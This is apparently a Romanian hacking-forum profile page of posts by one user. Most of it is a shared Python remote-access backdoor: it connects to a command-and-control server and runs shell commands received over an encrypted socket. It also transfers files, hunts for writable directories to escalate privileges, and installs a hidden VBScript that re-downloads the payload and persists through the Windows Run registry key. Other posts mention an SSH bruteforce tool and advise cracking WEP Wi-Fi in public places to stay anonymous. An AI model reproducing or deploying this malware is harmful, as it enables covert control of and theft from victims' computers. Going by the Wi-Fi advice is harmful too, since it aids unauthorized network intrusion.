    Poate are cineva de invatat din el. C&C-ul era jos cand verificasem eu. Mi-a placut cum verifica privilegiile si mai mult de atat, ca trimite datele criptat. Multumesc lui @Echo %a >> p1.txt') xv = Exec('for /f eol^=^"^ delims^=^" %a in (p1.txt) do cmd.exe /c icacls "%a" >> p2.txt') time.sleep(40) ap = 0 bp = 0 dp = open('p2.txt') lines = dp.readlines() for line in lines: cp = 0 while cp < len(permatch): j = line.find(permatch[cp]) if j != -1: if permbool == False: privinfo += 'The following directories have write access:\n\n' permbool = True bp = ap while True: if len(lines[bp].split('\\')) > 2: while bp <= ap: privinfo += lines[bp] bp += 1 break else: bp -= 1 cp += 1 ap += 1 time.sleep(4) if permbool == True: privinfo += '\nReplace executable with Python shell.\n' if permbool == False: privinfo += '\nNo directories with misconfigured premissions found.\n' dp.close() xv = Exec('del p1.txt') xv = Exec('del p2.txt') return privinfo def Persist(sock, redown=None, newdir=None): if os.name == 'nt': privscheck = Exec('reg query "HKU\S-1-5-19" | find "error"') if privscheck != '': return "You must be authority\system to enable persistence.\n" else: exedir = os.path.join(sys.path[0], sys.argv[0]) exeown = exedir.split('\\')[-1] vbsdir = os.getcwd() + '\\' + 'hkcmds.vbs' if redown == None: vbscript = 'state = 1\nhidden = 0\nwshname = "' + exedir + '"\nvbsname = "' + vbsdir + '"\nWhile state = 1\nexist = ReportFileStatus(wshname)\nIf exist = True then\nset objFSO = CreateObject("Scripting.FileSystemObject")\nset objFile = objFSO.GetFile(wshname)\nif objFile.Attributes AND 2 then\nelse\nobjFile.Attributes = objFile.Attributes + 2\nend if\nset objFSO = CreateObject("Scripting.FileSystemObject")\nset objFile = objFSO.GetFile(vbsname)\nif objFile.Attributes AND 2 then\nelse\nobjFile.Attributes = objFile.Attributes + 2\nend if\nSet WshShell = WScript.CreateObject ("WScript.Shell")\nSet colProcessList = GetObject("Winmgmts:").ExecQuery ("Select * from Win32_Process")\nFor Each objProcess in colProcessList\nif objProcess.name = "' + exeown + '" then\nvFound = True\nEnd if\nNext\nIf vFound = True then\nwscript.sleep 50000\nElse\nWshShell.Run """' + exedir + '""",hidden\nwscript.sleep 50000\nEnd If\nvFound = False\nElse\nwscript.sleep 50000\nEnd If\nWend\nFunction ReportFileStatus(filespec)\nDim fso, msg\nSet fso = CreateObject("Scripting.FileSystemObject")\nIf (fso.FileExists(filespec)) Then\nmsg = True\nElse\nmsg = False\nEnd If\nReportFileStatus = msg\nEnd Function\n' else: if newdir == None: newdir = exedir newexe = exeown else: newexe = newdir.split('\\')[-1] vbscript = 'state = 1\nhidden = 0\nwshname = "' + exedir + '"\nvbsname = "' + vbsdir + '"\nurlname = "' + redown + '"\ndirname = "' + newdir + '"\nWhile state = 1\nexist1 = ReportFileStatus(wshname)\nexist2 = ReportFileStatus(dirname)\nIf exist1 = False And exist2 = False then\ndownload urlname, dirname\nEnd If\nIf exist1 = True Or exist2 = True then\nif exist1 = True then\nset objFSO = CreateObject("Scripting.FileSystemObject")\nset objFile = objFSO.GetFile(wshname)\nif objFile.Attributes AND 2 then\nelse\nobjFile.Attributes = objFile.Attributes + 2\nend if\nexist2 = False\nend if\nif exist2 = True then\nset objFSO = CreateObject("Scripting.FileSystemObject")\nset objFile = objFSO.GetFile(dirname)\nif objFile.Attributes AND 2 then\nelse\nobjFile.Attributes = objFile.Attributes + 2\nend if\nend if\nset objFSO = CreateObject("Scripting.FileSystemObject")\nset objFile = objFSO.GetFile(vbsname)\nif objFile.Attributes AND 2 then\nelse\nobjFile.Attributes = objFile.Attributes + 2\nend if\nSet WshShell = WScript.CreateObject ("WScript.Shell")\nSet colProcessList = GetObject("Winmgmts:").ExecQuery ("Select * from Win32_Process")\nFor Each objProcess in colProcessList\nif objProcess.name = "' + exeown + '" OR objProcess.name = "' + newexe + '" then\nvFound = True\nEnd if\nNext\nIf vFound = True then\nwscript.sleep 50000\nEnd If\nIf vFound = False then\nIf exist1 = True then\nWshShell.Run """' + exedir + '""",hidden\nEnd If\nIf exist2 = True then\nWshShell.Run """' + dirname + '""",hidden\nEnd If\nwscript.sleep 50000\nEnd If\nvFound = False\nEnd If\nWend\nFunction ReportFileStatus(filespec)\nDim fso, msg\nSet fso = CreateObject("Scripting.FileSystemObject")\nIf (fso.FileExists(filespec)) Then\nmsg = True\nElse\nmsg = False\nEnd If\nReportFileStatus = msg\nEnd Function\nfunction download(sFileURL, sLocation)\nSet objXMLHTTP = CreateObject("MSXML2.XMLHTTP")\nobjXMLHTTP.open "GET", sFileURL, false\nobjXMLHTTP.send()\ndo until objXMLHTTP.Status = 200 : wscript.sleep(1000) : loop\nIf objXMLHTTP.Status = 200 Then\nSet objADOStream = CreateObject("ADODB.Stream")\nobjADOStream.Open\nobjADOStream.Type = 1\nobjADOStream.Write objXMLHTTP.ResponseBody\nobjADOStream.Position = 0\nSet objFSO = Createobject("Scripting.FileSystemObject")\nIf objFSO.Fileexists(sLocation) Then objFSO.DeleteFile sLocation\nSet objFSO = Nothing\nobjADOStream.SaveToFile sLocation\nobjADOStream.Close\nSet objADOStream = Nothing\nEnd if\nSet objXMLHTTP = Nothing\nEnd function\n' vbs = open('hkcmds.vbs', 'wb') vbs.write(vbscript) vbs.close() persist = Exec('reg ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v hkcmds /t REG_SZ /d "' + vbsdir + '"') persist += '\nPersistence complete.\n' return persist def Exec(cmde): if cmde: execproc = subprocess.Popen(cmde, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) cmdoutput = execproc.stdout.read() + execproc.stderr.read() return cmdoutput else: return "Enter a command.\n" while True: try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) cipher = AES.new(secret,AES.MODE_CFB) data = Receive(s) if data == 'Activate': active = True Send(s, "\n"+os.getcwd()+">") while active: data = Receive(s) if data == '': time.sleep(0.02) if data == "quit" or data == "terminate": Send(s, "quitted") break elif data.startswith("cd ") == True: try: os.chdir(data[3:]) stdoutput = "" except: stdoutput = "Error opening directory.\n" elif data.startswith("download") == True: stdoutput = Upload(s, data[9:]) elif data.startswith("downhttp") == True: stdoutput = Downhttp(s, data[9:]) elif data.startswith("upload") == True: stdoutput = Download(s, data[7:]) elif data.startswith("privs") == True: stdoutput = Privs(s) elif data.startswith("persist") == True: if len(data.split(' ')) == 1: stdoutput = Persist(s) elif len(data.split(' ')) == 2: stdoutput = Persist(s, data.split(' ')[1]) elif len(data.split(' ')) == 3: stdoutput = Persist(s, data.split(' ')[1], data.split(' ')[2]) else: stdoutput = Exec(data) stdoutput = stdoutput+"\n"+os.getcwd()+">" Send(s, stdoutput) if data == "terminate": break time.sleep(3) except socket.error: s.close() time.sleep(10) continue
  20. MadAgent
    Am spus ce voiam in intrebare, daca voiam sa ma ajute cineva cu ceva, probabil postam in Ajutor, nu in Off-topic. Voiam sa vad daca a dat cineva peste el pana acuma.
  21. MadAgent
    Daca a facut cineva sau a folosit cineva. Daca e una dintre cele 2 variante oricum iti dai seama ca nu esti orb... Sau pe tine nu te zgaria pe ochi cu 10 ani in urma cand vedeai "Toata dragostea mea pentru diavola".
  22. MadAgent
    A vazut cineva(sau a facut cineva de aici) asta? System.out.println("[+] thaGod's private SSH bruteforce tool ;)"); System.out.println("[+] Scanning : " + arg[0] + " class"); Se mai foloseste asa ceva?
  23. MadAgent
    Daca nu am trai in Romania, ar fi cam greu sa faca asta. Daca intuiesc bine, pedeapsa nu se poate schimba, daca ai primit sentinta pe vechiul cod penal. La fel cum din punct de vedere legal e imposibil sa fi acuzat pe o lege care a aparut dupa ce tu ai savarsit fapta(ex: eu azi merg pe DN1 si maine nu mai am voie, nu primesc amenda ca azi merg, numai daca maine merg iarasi; se pune de maine taxa pe respirat - plates de maine, nu de cand m-am nascut).
  24. MadAgent

    www1 / www

    MadAgent replied to p3tru's topic in Off-topic

    Bineinteles ca merge. Iti pointezi domeniu si alias-ul(www) catre un IP, subdomeniul(sau www1) catre alt IP.
  25. MadAgent
    Frumos tutorial. Totusi, eu nu as folosi TOR. Din cate stiu eu, nu numai ca guvernul american finanteaza proiectul, dar l-au prins si pe detinatorul SilkRoad, detinator care gandise bine treaba cu TOR, anonimitate, 10.000 de layere etc. In loc de TOR, cred ca ar fi mai buna solutia cu tunel in tunel pe SSH(inlantuire de tunele). Si mai important. Nu fa setup-ul de acasa. Mergi si tu ca omu' intr-un bar cu WIFI sau la camine studentesti si sparge un WiFi cu WEP(dureaza fix 10 minute si sunt o gramada care mai au WEP). Stai linistit la o cafea cu lapp in fata(in bar - mai pui si un pantalon de stofa si o camasa pe tine) sau pe bordura cu laptopu' si cu o bere(la camine - pantaloni scurti, fara tricou), pari cat mai natural. Si dupa ce am postat am vazut ca spuneati de MITM, dar mai bine afla un tip ca ti-ai facut cont de VPN, decat sa afle cei care nu vreau eu sa afle.
×
×
  • Create New...